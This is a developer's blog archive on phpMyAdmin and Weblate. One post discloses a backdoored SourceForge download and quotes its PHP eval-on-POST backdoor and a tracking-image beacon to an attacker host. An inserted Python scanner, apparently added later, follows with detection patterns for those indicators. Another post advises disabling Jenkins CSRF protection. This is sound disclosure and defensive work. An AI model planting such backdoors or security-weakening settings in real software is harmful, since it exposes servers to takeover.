Michal Čihař - Blog Archives for phpMyAdmin

Weblate 1.3

Right on the updated schedule (i.e. one month later than originally planned), Weblate 1.3 has been released today. It comes with a lot of improvements, especially in support of non-gettext files, new quality checks and improved performance.

Full list of changes for 1.3:

  • Compatibility with PostgreSQL database backend.
  • Removes languages removed in upstream git repository.
  • Improved consistency checks processing.
  • Added new checks (BB code, XML markup and newlines).
  • Support for optional rebasing instead of merge.
  • Possibility to relocate Weblate (eg. to run it under /weblate path).
  • Support for manually choosing file type in case autodetection fails.
  • Better support for Android resources.
  • Support for generating SSH key from web interface.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Support for locking down whole Weblate installation.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.
  • Improved support for RTL languages.

You can find more information about Weblate on its website; the code is hosted on GitHub. If you are curious how it looks, you can try it out on the demo server. You can log in there with the demo account using the demo password or register your own user. Ready-to-run appliances will soon be available in SUSE Studio Gallery.

Weblate is also being used at https://l10n.cihar.com/ as the official translation service for phpMyAdmin, Gammu, Weblate itself and others.

If you are a free software project which would like to use Weblate, I'm happy to help you with the setup or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Call for Weblate translations

Weblate is close to the 1.3 release (should happen on Friday if nothing urgent appears) and it's pretty much the last chance for translators to catch up.

Weblate is of course translated using Weblate, but you can also translate Gettext po files directly and either upload them into Weblate or use the GitHub issue tracker for that.

Weblate translation status

If you don't know Weblate yet, it is a web-based tool for translating with Git integration. You can also call it a crowdsourcing platform if you wish :-).

phpMyAdmin's documentation

As I've already written before, phpMyAdmin is getting new documentation. The basic conversion has already been done and merged, but there are always things to improve.

Right now I'm spending my free time on improving that and pushing the documentation forward. But hey, you can help in this area as well - just look at it on http://docs.phpmyadmin.net/ and in case you see any problems, fix them or at least report them.

The easiest way to contribute a fix is to use the online editor GitHub provides. Just navigate to the documentation sources, choose the appropriate file, click on edit (which automatically forks the project for you) and once you're satisfied with your changes, open a pull request.

In case this still looks too hard for you, just open a bug report or write to us on the mailing list or IRC.

And you can of course also contribute to documentation translations, which did unfortunately suffer quite a lot from the documentation conversion.

New documentation for phpMyAdmin

I was quite unhappy with the shape of our documentation for some time, but this week I finally found some time to dig deeper into converting it into something more usable.

Nowadays I'm mostly using Sphinx for writing documentation, which makes it easy to write in RST and provides output in various formats. Together with the Read the Docs service, it makes a great combo for providing user documentation, which I use for example for Weblate.

So with a little bit of magic in Python and Beautiful Soup I was able to convert most of the HTML documentation into RST without tons of manual work. The resulting source (and ugly conversion script) temporarily lives on my GitHub and the generated documentation is available on Read the Docs.

There are of course still many things to improve, but I think even right now it is easier to navigate than the previous monolithic HTML file.

Now we need to decide if and how to integrate this into official repositories and I can then continue on improving the documentation content.

Weblate 1.3 on l10n.cihar.com

As the Weblate release is getting closer, I've decided to give the new version more testing in real life and it got deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features; the most interesting for users might be:

  • Better and new consistency checking.
  • Better support for Android resources.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.

You can see the full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

New phpMyAdmin theme

Today, I've finally found time to process new themes for phpMyAdmin. The result is two theme releases.

The first one was just a minor update to an older theme (Darkblue/orange 2.11), which fixed behavior in Internet Explorer.

The second one was a completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually the first contributed theme compatible with the 3.5 series.

Of course you can find all of these on our themes page.

Compromised SourceForge mirror

Yesterday, the phpMyAdmin security team was notified about a backdoor being distributed together with the phpMyAdmin zip file on one of the SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in the phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code: there was a file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, JavaScript code has been included, which could allow an attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all, it looks like a simple but quite effective way to install a backdoor, had they been able to spread it more widely. We immediately released PMASA-2012-5 to notify our users.

Luckily this was spotted quite fast (looking at the domain used, the exploit could not have been live before 22nd September 2012) and not on a very frequently used mirror (based on SourceForge's official statement, about 400 users have downloaded the file with the backdoor).

What still remains unclear is whether this was really targeted only at phpMyAdmin, or whether there were more modified files on this mirror (SourceForge hosts thousands of projects). I randomly tried a few of our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do a more systematic analysis, so this question can now be answered only by SourceForge.
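
A defender-side check for the indicators described in this post, as an added example (not phpMyAdmin's or SourceForge's code): it scans a downloaded zip for a file named server_sync.php, for eval called on request data, and for the logos.phpmyadmin-images.net host. The other request superglobals in the pattern generalize the $_POST case shown above, and the sample archive and its other file names are constructed for the demo.

```python
import io
import re
import zipfile

# Indicators taken from the post: the extra file name, the eval-on-POST
# one-liner, and the host the injected JavaScript loads an image from.
BACKDOOR_FILE = "server_sync.php"
EVAL_ON_INPUT = re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")
BEACON_HOST = b"logos.phpmyadmin-images.net"
TEXT_SUFFIXES = (".php", ".js", ".html")


def scan_archive(zip_bytes):
    """Return a sorted list of (member, reason) findings for a zip archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            name = info.filename
            if info.is_dir():
                continue
            if name.rsplit("/", 1)[-1].lower() == BACKDOOR_FILE:
                findings.append((name, "unexpected file name"))
            if not name.lower().endswith(TEXT_SUFFIXES):
                continue
            data = archive.read(info)
            if EVAL_ON_INPUT.search(data):
                findings.append((name, "eval on request data"))
            if BEACON_HOST in data:
                findings.append((name, "beacon host reference"))
    return sorted(findings)


def build_sample(tampered):
    """Constructed archive; names other than server_sync.php are made up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("pma/index.php", "<?php echo 'ok'; ?>")
        archive.writestr("pma/js/common.js", "var x = 1;")
        if tampered:
            archive.writestr("pma/server_sync.php", "<?php @eval($_POST['c']);?>")
            archive.writestr(
                "pma/js/extra.js",
                'icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";',
            )
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in scan_archive(build_sample(tampered=True)):
        print(f"{member}: {reason}")
```

A clean result only means these three indicators are absent; it does not show that the archive matches what the project released.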

Sponsoring phpMyAdmin

We've decided to accept sponsorships of phpMyAdmin in a more official way. So if you or your company want to financially support this software, you now have a great chance to do that.

From time to time we've received offers for sponsoring, but we never got to the point where we could easily handle these. In the past we were limited by sf.net requirements for no advertisement on website, but it got leveraged over the time and we did not change our policy much.

For now the only benefit we are providing to our sponsors (besides the good feeling that they are supporting a good project) is a logo and link on our website. In the future we might add some more, but at first we want to see how it works at this scale.

Anyway if you are interested in sponsoring phpMyAdmin, you can do that on our website.

Triggering Jenkins from GitHub

For some time I thought it is not effective to use polling to get the latest changes from GitHub into Jenkins, which we use for continuous integration, but I was always too lazy to investigate.

Today I finally took a look at it and it turns out to be quite easy:

  1. Enable the GitHub plugin in Jenkins.
  2. Enable "Build when a change is pushed to GitHub" in project configuration in Jenkins.
  3. Disable "Prevent Cross Site Request Forgery exploits" in Jenkins configuration (to prevent bug JENKINS-10263).
  4. Configure the Jenkins service hook in GitHub to trigger your server (the URL is http://<jenkins>/github-webhook/).

Try testing the hook and check "GitHub Hook Log" in Jenkins to see if it really works, and you're done.

So now, phpMyAdmin's tests should start as soon as somebody pushes changes to GitHub.

GSoC evaluations submitted

Even though I've planned to do this on Monday, it somehow slipped to Wednesday, but I've finally filled in GSoC 2012 evaluations for all students I mentor at phpMyAdmin.

Generally all of them perform quite well, but there is always room for improvement :-).

The greatest pain every year is filling in evaluations for more students - each of them starts with the same questions for the mentor (e.g. how many GSoCs did you participate in or how much time you spend on GSoC). I know I can copy and paste answers, but still this looks like something not necessary. Also some information is probably already known to Google (e.g. in which years I did participate in GSoC).